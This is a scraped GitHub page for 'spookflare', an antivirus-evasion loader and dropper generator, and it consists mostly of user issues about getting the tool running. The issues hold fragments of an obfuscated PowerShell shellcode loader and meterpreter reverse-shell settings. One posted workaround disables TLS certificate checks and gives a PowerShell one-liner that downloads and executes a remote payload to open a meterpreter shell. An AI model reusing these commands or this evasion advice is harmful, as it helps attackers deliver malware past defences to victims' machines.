hlldz / spookflare Goto Github PK

View Code? Open in Web Editor NEW

944.0 50.0 190.0 78 KB

Loader, dropper generator with multiple features for bypassing client-side and network-side countermeasures.

License: Apache License 2.0

Python 100.00%

av-bypass loader dropper av-evasion endpoint-bypass antivirus-evasion antivirus-testing obfuscation bypass

spookflare's People

Contributors

Stargazers

Watchers

Forkers

hotelzululima securycore teakolik hanshaze axiao111 aln7 w9hax techlord-rce tobey123 hyeri0609 elix0r minkione jack51706 s0j0hn ankushgoel27 chouaibhm exploitcollection topotam jymcheong tmaxter oksbsb n0ooooone av1080p akiraaisha orf53975 team-firebugs cjjduck 2010phenix ovidsec melkorazo m00zh33 gavz ro9ueadmin xnianq devclev maskup joaopaulopacheco mehrdad-shokri slowmistio securitym0nk laraveliran dmchell grukz kernullist izogain unbaiat shantanu561993 rakesh72 whoamiecho lexluga bijaye fuckup1337 vysecurity kimusan w00t3k kevien guardianrg cclauss wzor 0xabe-io d4mn4t10n aurorafang cyberdeep shalekesan moriarty2016 enki-security subinacls vaginessa superdong0 deelmind juan157 hapazores maxssage theralfbrown tim1512 aridoshikagithub netkey eltorobiz rdincel1 jrodriguez556 r0cknrolla disk-kk diggold w7374520 h0k5 redwifiteam riviera12345 nckatiku gcansiz rizzy01 samentlc hmilkovi shangadi analyticsearch excellenperson veteransec mkv4 cybersecgit m1sternt killvxk

spookflare's Issues

pip installation issue

When I run pip install -r requirements.txt in kali linux I get the following.

I also got the same error for textwrap

using no ip or other dns

hi friend
is it possible in place of ip to write my no-ip adress?

Compile C# in Kali (Debian)?

Hello, can you assist with compiling the .cs files using some Linux variant? I think it can be done using mono as seen here but MonoDevelop crashes when I try importing .cs files. Any ideas?

Error : Powershell and cs loader

Hi,
I tried to generate the loader using option 2 powershell and cs loader, I compiled using csc but its gave me this error:

Exception

calling "DownloadData" with "1" argument(s): "The server committed a protocol violation.
Section=ResponseStatusLine"
At E:\a.ps1:6 char:258

... ,en;q=0.5");[Byte[]] $SXBQYrXFaTja = $MBmARZhcoqfe."DownloadDat ...
```
            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : NotSpecified: (:) [], MethodInvocationException
- FullyQualifiedErrorId : WebException

Exception calling "Copy" with "5" argument(s): "Value cannot be null.
Parameter name: source"
At E:\a.ps1:6 char:413

... Length - 0);[Array]::Copy($SXBQYrXFaTja, 0, $nUUuHCSJJEek, 0, ($SXBQY ...
```
            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : NotSpecified: (:) [], MethodInvocationException
- FullyQualifiedErrorId : ArgumentNullException

Exception calling "Copy" with "4" argument(s): "Value cannot be null.
Parameter name: destination"
At E:\a.ps1:6 char:691

... x3000,0x40);[Runtime.InteropServices.Marshal]::Copy($nUUuHCSJJEek, 0, ...
```
            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : NotSpecified: (:) [], MethodInvocationException
- FullyQualifiedErrorId : ArgumentNullException

The target Windows 10 operating system is using x64, also used x64 when generating the EXE. An msf connection is established between my windows device and kali device, but the EXE crashes almost immediately and the connection is closed.

This time I used the latest available release. But I've noticed the v1.0 interface is a lot different from the latest interface used when I git clone your repository. @hlldz

File "spookflare.py", line 31

I'm having some issues running spookflare in Windows 10. Python is installed and $ pip install -r requirements.txt worked without any errors. What am I doing wrong here?

C:\Users\xajyvi\Desktop\SpookFlare>python spookflare.py
  File "spookflare.py", line 31
	print " \n\n \033[1m\033[94m[*]\033[0m Exited but do not forget to stay in the shadows!\033[0m\n"
																									^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(" \n\n \033[1m\033[94m[*]\033[0m Exited but do not forget to stay in the shadows!\033[0m\n")?

C:\Users\xajyvi\Desktop\SpookFlare>.\spookflare.py
  File "C:\Users\xajyvi\Desktop\SpookFlare\spookflare.py", line 31
	print " \n\n \033[1m\033[94m[*]\033[0m Exited but do not forget to stay in the shadows!\033[0m\n"
																									^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(" \n\n \033[1m\033[94m[*]\033[0m Exited but do not forget to stay in the shadows!\033[0m\n")?

Run tool

Hi, I would like to know how to run the tool on the Kali Linux terminal, tried in a few ways but could not execute, tried ./SpookFlare.sln but did not run, what would be the correct procedure?
Thank you.

Work Like the BEEF?

Doesn't it work like the beef like working on the client side without any download, Where most of the victims knew that the downloaded files will be malware!
Is there any other implementation like running background of the browser!

Not getting shell

@hlldz
PROTO : https
patched : no

payload used

windows/x64/meterpreter/reverse_https
windows/x64/meterpreter/reverse_winhttps

Compiler

Visual studio 2017
csc

Metasploit version
5.0.22-dev

windows version
windows 10 v1809 (build 17763)

Defender & firewall was off during testing.

Nothing happens after executing .exe file.

Also Can I compile it using mono on linux?

Problem With SpookFlare.rc

Hello and congratulation for the great tool.
Im encountering a problem while operating with the tool.
Following the instructional video i'm not able to find the SpookFlare.rc file

Here also what i have in the folder

in the end, im having this error:

Is there a way to fix this ? I'll be waiting for an answer, thanks again!

C# kodunu derlerken "Newline in constant" hatası

C# kodunu csc.exe ile derlemek istediğimde aşağıdaki hata ile karşılaşıyorum:

Desktop\SpookFlare-master\output\jhjzjTwQRIma.cs(5,56): error CS1010: Newline in constant Desktop\SpookFlare-master\output\jhjzjTwQRIma.cs(5,58): error CS1513: } expected Desktop\SpookFlare-master\output\jhjzjTwQRIma.cs(5,58): error CS1513: } expected

SSL/TLS Negotiation Error with Powershell Payload and MSF - FIX/WORKAROUND

So this is a great project! So currently the https ps1 payload will give you the following error: Exception calling "DownloadFile" with "2" argument(s): "The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel."

You can get around this by placing the following code at the top of the ps1 output file generated by spookflare:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Once you do that you can just call the file from a cmd prompt like so and get your https meterpreter shell: powershell -w 1 -c "iwr('http://x.x.x.x/PS1-OUTPUT.txt')|iex"

Cheers!

Exe compiled V2.0 please ?

SpookFlare [vba/macro] > set CMD

Getting this when i run the set CMD

SpookFlare [vba/macro] > set CMD
Traceback (most recent call last):
File "spookflare.py", line 459, in
sfCmds.cmdloop()
File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.7/cmd.py", line 221, in onecmd
return func(arg)
File "spookflare.py", line 78, in do_use
sfCmds.cmdloop()
File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.7/cmd.py", line 221, in onecmd
return func(arg)
File "spookflare.py", line 78, in do_use
sfCmds.cmdloop()
File "/usr/lib/python2.7/cmd.py", line 142, in cmdloop
stop = self.onecmd(line)
File "/usr/lib/python2.7/cmd.py", line 221, in onecmd
return func(arg)
File "spookflare.py", line 430, in do_set
vbaCmdFile = line.split()[1]
IndexError: list index out of range

Thanks